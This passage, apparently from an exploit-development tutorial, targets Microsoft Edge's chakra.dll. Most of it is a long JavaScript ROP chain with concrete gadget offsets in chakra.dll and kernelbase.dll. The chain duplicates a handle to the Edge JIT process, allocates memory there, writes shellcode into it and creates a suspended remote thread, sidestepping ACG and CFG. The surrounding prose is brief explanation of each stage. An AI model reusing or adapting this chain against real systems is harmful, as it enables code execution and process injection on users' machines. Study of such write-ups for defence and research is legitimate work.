	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	-
);

The last parameter we need to write to the stack, so we will go ahead and load WriteProcessMemory into RAX and directly write our NULL value.

Here is our VirtualProtect ROP chain before (we are trying to update it an exploit runtime):

After (using pt to execute the call to WriteProcessMemory, which pauses execution on the ret):

As we can see, we successfully updated our ROP chain so that when the VirtualProtect ROP chain is eventually called, it is aware of where our shellcode is.

WriteProcessMemory ROP Chain (Round 3)

This ROP chain is identical to the above ROP chain, except for the fact we want to overwrite a placeholder for the “fake return address” after our eventual call to VirtualProtect. We want VirtualProtect, after it is called, to transfer execution to our shellcode. This can be seen in a snippet of our VirtualProtect ROP chain.

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();

We need to reconcile this, just like we did in our last WriteProcessMemory call, where we dynamically updated the ROP chain. Again, we need to use another call to WriteProcessMemory to update this last location. This will ensure our eventual VirtualProtect ROP chain is good to go. We will omit these steps, as it is all documented above, but I will still provide the updated code below.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
